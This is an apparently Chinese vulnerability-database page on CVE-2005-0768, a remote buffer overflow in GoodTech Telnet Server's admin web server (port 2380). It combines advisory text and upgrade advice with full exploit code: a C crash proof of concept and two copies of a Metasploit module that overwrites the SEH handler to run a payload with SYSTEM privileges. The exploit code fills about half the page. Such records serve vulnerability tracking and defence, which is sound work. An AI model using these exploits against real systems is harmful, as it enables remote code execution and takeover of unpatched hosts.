CVE-2005-0768
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:14:12
NMCOEPS    

[原文]Buffer overflow in the administration web server for GoodTech Telnet Server 4.0 and 5.0, and possibly all versions before 5.0.7, allows remote attackers to execute arbitrary code via a long string to port 2380.


[CNNVD]GoodTech Telnet Server缓冲区溢出漏洞(CNNVD-200505-203)

        在GoodTech Telnet Server的管理Web服务器(默认下在2380端口上运行)中存在一个漏洞,远程攻击者通过发送畸形的超长数据给服务器,会导致缓冲溢出。如果向该服务器发送以2个换行字符结束的超长(10040个字节)字符串的话,就可能导致缓冲区溢出,覆盖指令指针,这样攻击者就可能以LOCAL_SYSTEM权限远程执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:goodtech_systems:goodtech_telnet_server:4.0::windows_nt
cpe:/a:goodtech_systems:goodtech_telnet_server:5.0::windows_nt

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0768
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0768
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-203
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111092012415193&w=2
(UNKNOWN)  BUGTRAQ  20050315 GoodTech Telnet Server Buffer Overflow Vulnerability
http://unsecure.altervista.org/security/goodtechtelnet.htm
(UNKNOWN)  MISC  http://unsecure.altervista.org/security/goodtechtelnet.htm

- 漏洞信息

GoodTech Telnet Server缓冲区溢出漏洞
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        在GoodTech Telnet Server的管理Web服务器(默认下在2380端口上运行)中存在一个漏洞,远程攻击者通过发送畸形的超长数据给服务器,会导致缓冲溢出。如果向该服务器发送以2个换行字符结束的超长(10040个字节)字符串的话,就可能导致缓冲区溢出,覆盖指令指针,这样攻击者就可能以LOCAL_SYSTEM权限远程执行任意代码。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.goodtechsys.com/

- 漏洞信息 (882)

GoodTech Telnet Server < 5.0.7 Buffer Overflow Crash Exploit (EDBID:882)
windows dos
2005-03-15 Verified
0 Komrade
N/A [点击下载]
/******************************************************************************************

	GoodTech Telnet Server Buffer Overflow Crash POC
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
        on a Windows XP Professional sp2 operating system.

	This exploit connects to the Administration server of GoodTech Telnet Server
	(default port 2380) and sends a very long string (10040 bytes).
	After the exploit is sent the Telnet Server will crash, trying to access
	to a bad memory address: 0xDEADCODE.

	Usage: gtscrash.exe "IP address"

	Options:
	"IP address"	The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

	SOCKET sock;
	struct sockaddr_in sock_addr;
	WSADATA data;
	WORD p;
	p=MAKEWORD(2,0);
	WSAStartup(p,&data);
	int i, n, err;
	unsigned char *mex;
	char risp[4096];

	printf("------------------------------------------------------------------------------\r\n");
	printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
	printf("\t\t\tcreated by Komrade\r\n\r\n");

	printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
	printf("\t\tweb: http://unsecure.altervista.org\r\n");
	printf("------------------------------------------------------------------------------\r\n\r\n");


	if (argc < 2){
		printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
		printf("Options:\r\n");
		printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
		exit(0);
	}

	mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(2380); /* Administration web server port */
	sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

	err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
	if(err<0){
		printf("Unable to connect() to %s\n", argv[1]);
		exit(-1);
	}

	strcpy (mex, "GET /");

	for(i = strlen(mex); i < 10032; i++)
		mex[i]= 'a';
	mex[i]=0;

	strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
	strcat(mex, "\r\n\r\n");

	printf("Sending %d bytes.....\n\n", strlen(mex));
	n=send(sock, mex , strlen(mex), 0);

	n=recv(sock, risp, sizeof(risp), 0);
	if (n < 0)
		printf("GoodTech Telnet Server succesfully crashed!!\n");
	else{
		risp[n]=0;
		printf("%s\n", risp);
	}

	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-03-15]
		

- 漏洞信息 (16817)

GoodTech Telnet Server <= 5.0.6 Buffer Overflow (EDBID:16817)
windows remote
2010-05-09 Verified
2380 metasploit
N/A [点击下载]
##
# $Id: goodtech_telnet.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
				versions prior to 5.0.7. By sending an overly long string, an attacker can
				overwrite the buffer and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0768' ],
					[ 'OSVDB', '14806'],
					[ 'BID', '12815' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Mar 15 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(2380)
			], self.class)
	end

	def exploit
		connect

		sploit = rand_text_english(10020, payload_badchars)
		seh    = generate_seh_payload(target.ret)

		sploit[10012, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83203)

GoodTech Telnet Server <= 5.0.6 Buffer Overflow (PacketStormID:F83203)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-0768
[点击下载]

This Metasploit module exploits a stack overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in GoodTech Systems Telnet Server 
				versions prior to 5.0.7. By sending an overly long string, an attacker can 
				overwrite the buffer and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0768' ],
					[ 'OSVDB', '14806'],
					[ 'BID', '12815' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},					
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Mar 15 2005',
			'DefaultTarget'  => 0))

                        register_options([ Opt::RPORT(2380) ], self)
	end

	def exploit
		connect

		sploit = rand_text_english(10020, payload_badchars)
		seh    = generate_seh_payload(target.ret)

		sploit[10012, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
    

- 漏洞信息

14806
GoodTech Telnet Server Admin Web Server Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

A buffer overflow exists in GoodTech Telnet Server. The web server fails to validate data received on TCP port 2380 resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-03-15 2005-03-11
2005-03-16 2005-03-15

- 解决方案

Upgrade to version 5.0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

GoodTech Systems Telnet Server for Windows NT/2000/XP/2003 Remote Buffer Overflow Vulnerability
Boundary Condition Error 12815
Yes No
2005-03-15 12:00:00 2009-07-12 10:56:00
Komrade <unsecure@altervista.org> is credited with the discovery of this issue.

- 受影响的程序版本

GoodTech Telnet Server for Windows NT/2000/XP/2003 5.0
GoodTech Telnet Server for Windows NT/2000/XP/2003 4.0

- 漏洞讨论

A remote buffer overflow vulnerability affects GoodTech Systems Telnet Server for Windows NT/2000/XP/2003. This issue is due to a failure of the application to securely copy network-derived data into sensitive process buffers.

An attacker may leverage this issue to execute arbitrary code with SYSTEM privileges on a computer running a vulnerable version of the affected software.

- 漏洞利用

The 'goodTechTelnetBufferOverflowPoC.c proof of concept has been made available. The exploit 'goodTechTelnetBufferOverflowExploit.c' has been made available as well.

- 解决方案

Reportedly the vendor has released an upgrade dealing with this issue, although this is not confirmed. Please contact the vendor for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站